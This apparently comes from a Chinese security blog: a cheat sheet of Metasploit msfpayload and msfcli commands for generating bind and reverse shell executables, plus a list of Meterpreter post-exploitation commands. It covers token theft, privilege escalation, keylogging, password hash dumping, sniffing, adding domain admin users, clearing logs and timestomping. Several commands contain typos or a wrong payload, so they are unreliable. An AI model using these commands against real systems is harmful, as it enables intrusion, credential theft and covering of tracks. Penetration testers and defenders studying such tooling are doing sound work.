MsfPayloads&Meterpreter commands
0×01 MsfPayloads
1.在目标绑定端口的监听Shell
./msfpayload windows/shell_bind_tcp LPORT=4444 X > open_shell_on_port.exe
用nc直接连接端口
2.反连Shell
./msfpayload windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx X > reverse-shell.exe
本地监听
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx E
3.通过VNC协议绑定端口的Shell
./msfpayload windows/vncinject/bind_tcp LPORT=4444 X > listen-vnc.exe
本地监听
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=4444 RHOST=xxx.xxx.xxx.xxx DisableCourtesyShell=TRUE E
4.反连VNC会话的Shell
./msfpayload windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 X > /tmp/reverse-vnc.exe
本地监听
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 DisableCourtesyShell=TRUE E
5.Meterpreter的绑定端口Shell
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 DisableCourtesyShell=TRUE E
远程连接
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=xxx.xxx.xxx.xxx LPORT=4444 E
6.Meterpreter的反连Shell
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp RHOST=xxx.xxx.xxx.xxx LPORT=4444 E
本地监听
./msfcli exploit/multi/handler PAYLOAD=windowsmeterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 DisableCourtesyShell=TRUE E
0×02 Meterpreter
help:
帮助
run script:
运行一些脚本,比如 get_local_subnets
sysinfo:
显示系统信息
ls:
列目录
use priv:
载入权限扩展
ps:
列进程
migrate PID:
迁移到指定进程
use incognito:
载入隐藏函数. (用于模拟上一个机器的Token.我也没太明白这个功能?)
list_tokens –u:
列出有效用户Token
list_touken –g:
列出有效用户组Token
impersonate_token DOMAIN_NAME\\USERNAME:
模拟域用户Token
steal_token PID:
偷取有效Token给进程
drop_token:
降权
getsystem:
尝试通过多重手段自动提权
shell:
开启一个交互的shell
execute –f cmd.exe –i
激活cmd.exe并与之交互
execute –f cmd.exe –i –t
用所有有效Token执行cmd.exe
rev2selft:
恢复到原始用户权限
reg command:
操作注册表,create,delete,query,set
setdesktop number:
选择当前用户桌面
screenshot:
给目标截图
upload file:
上传文件
download file:
下载文件
keyscan_start:
开启键盘记录
keyscan_dump:
查看键盘记录内容
keyscan_stop:
停止键盘记录
getprivs:
尝试取得可能的权限
uictl enable keyboard/mouse:
操控鼠标/键盘
background:
后台运行Meterpreter
hashdump:
抓哈希
use sniffer:
载入嗅探模块
sniffer_interfaces:
列出所有可嗅探的网卡
sniffer_dump interfaceID pcapname:
设定在哪张网卡嗅探并保存pcap包
sniferr_start:
开始嗅探
sniffer_start interfaceID packet-buffer:
设定缓冲并在指定接口上嗅探
sniffer_stats interfaceID:
取得接口的相关信息
sniffer_stop interfaceID:
停止嗅探
add_user:
添加用户
add_group_user "Domain Admins":
添加域管用户
clearv:
干掉日志
timestomp:
改变文件属性(时间)
reboot:
重启
上一篇: 一路问情自动灌水机破解分析
下一篇: SQL注入漏洞测试工具比较
推荐阅读
-
[HDFS Manual] CH3 HDFS Commands Guide
-
MsfPayloads&Meterpreter commands
-
Python2.x利用commands模块执行Linux shell命令
-
python commands模块的适用方式
-
MySQL问题一则:Commands out of sync; you can't run this comm_MySQL
-
使用Commands Framework创建菜单
-
XCode10.2.1打开老工程报Multiple commands produce与Info.plis错误
-
Xcode React-native Archive 报错 Multiple commands produce...IntermediateBuildFilesPath/UninstalledProd
-
IOS下XCODE10错误:Multiple commands produce解决方法
-
MySQL问题一则:Commands out of sync; you can't run this comm_MySQL